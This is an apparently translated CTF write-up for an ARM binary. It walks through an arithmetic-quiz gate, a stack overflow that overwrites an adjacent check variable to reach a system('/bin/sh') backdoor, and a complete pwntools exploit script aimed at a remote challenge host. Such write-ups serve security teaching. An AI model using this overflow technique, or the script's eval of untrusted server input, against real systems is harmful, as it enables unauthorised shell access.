The challenge provides a single ELF file; IDA identifies it as an ARM ELF, which makes it awkward to debug.
The main function is as follows.
First you must answer simple arithmetic questions correctly 200 times to reach the next stage.
do
{
    v0 = time(0LL);
    v15 = v0;
    v1 = srand(v0);                 /* re-seeded from the current second on every round */
    v2 = (unsigned int)((signed int)rand(v1) % 100);
    v14 = v2;
    v3 = (unsigned int)((signed int)rand(v2) % 100);
    v13 = v3;
    v4 = (unsigned int)((signed int)rand(v3) % 100);
    v12 = v4;
    v11 = (signed int)rand(v4) % 100;
    printf("there have 200 levels ~");
    printf("Math: %d * %d + %d + %d = ???");   /* operands v14, v13, v12, v11; the decompiler dropped the variadic arguments */
    printf("input answer:");
    read(0LL, &v6, 20LL);
    v10 = v14 * v13 + v12 + v11;
    v9 = strtol(&v6, 0LL, 10LL);
    if ( v10 != v9 )
    {
        puts("wrong ");
        exit(0LL);
    }
    puts("good !");
    ++v16;
}
while ( v16 <= 199 );
The challenge has an obvious stack overflow:
v8 = 256;
read(0LL, &v7, 110LL);          /* 110 bytes read into v7, more than the space below v8 */
if ( v8 == 0x12235612 )
{
    puts("get it ~");
    sub_400920();
}
The challenge ships a ready-made backdoor:
__int64 sub_400920()
{
    return system("/bin/sh");
}
Analysis shows that overflowing the data in v7 reaches the address of v8, so the value of v8 can be rewritten from 256 to 0x12235612, which runs the backdoor.
By calculation, the distance between v8's address and v7's address is 0xDC - 0x78 = 0x64.
The exploit is as follows:
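As an added illustration (not code from the challenge binary or this writeup), here is the defect side by side with the fix a developer would apply: the length passed to the read must be bounded by the destination buffer, so no input byte can reach the adjacent check variable. The frame layout, the 100-byte buffer (the 0x64 gap computed above) and the function names are assumptions for the model.

```c
#include <stdint.h>
#include <string.h>

#define BUF_LEN   100          /* assumed: the 0x64-byte gap from v7 to v8 */
#define READ_LEN  110          /* the length the binary passes to read() */
#define MAGIC     0x12235612u  /* the value the binary compares v8 against */

/* Explicit model of the stack frame: `guard` plays the role of v8 and sits
 * directly after the input buffer, as in the decompiled function.
 * `above` stands in for whatever lies beyond v8 so the model stays in bounds. */
struct frame {
    char          buf[BUF_LEN];
    uint32_t      guard;
    unsigned char above[16];
};

/* Shape of the original check: the copy length is the fixed READ_LEN, not the
 * buffer size, so input bytes 100..103 land on `guard` (models read(0, &v7, 110)). */
int check_vulnerable(const char *input, size_t len) {
    struct frame f;
    memset(&f, 0, sizeof f);
    f.guard = 256;
    size_t n = len < READ_LEN ? len : READ_LEN;
    memcpy(&f, input, n);
    return f.guard == MAGIC;
}

/* Hardened version: the copy is bounded by sizeof(f.buf) and NUL-terminated,
 * so no input byte can reach `guard`; the comparison can then only succeed
 * through whatever legitimate path sets it, never through the read. */
int check_hardened(const char *input, size_t len) {
    struct frame f;
    memset(&f, 0, sizeof f);
    f.guard = 256;
    size_t n = len < sizeof f.buf - 1 ? len : sizeof f.buf - 1;
    memcpy(f.buf, input, n);
    f.buf[n] = '\0';
    return f.guard == MAGIC;
}

/* Feeds both variants the same constructed 108-byte input (100 filler bytes,
 * then MAGIC in host byte order, then 4 zero bytes, mirroring the writeup's
 * payload layout) and reports whether the guard check passed. */
int probe(int (*check)(const char *, size_t)) {
    char input[BUF_LEN + 8];
    uint32_t m = MAGIC;
    memset(input, 'a', BUF_LEN);
    memcpy(input + BUF_LEN, &m, sizeof m);
    memset(input + BUF_LEN + sizeof m, 0, 4);
    return check(input, sizeof input);
}
```

With the same input, probe(check_vulnerable) reports the guard overwritten while probe(check_hardened) does not, which is the whole difference between the two read lengths.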
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context.log_level = 'debug'
r = remote('39.97.210.182', 40285)
# Stage 1: answer the 200 arithmetic questions the binary prints as
# "Math: a * b + c + d = ???" (the expression received from the server is evaluated as-is).
for i in range(200):
    r.recvuntil('~Math: ')
    math = r.recvuntil('=')[:-1]
    r.sendline(str(eval(math)))
# Stage 2: 0x64 filler bytes reach v8, followed by its new value (see the offset above).
r.sendline(b'a' * 0x64 + p64(0x12235612))
r.interactive()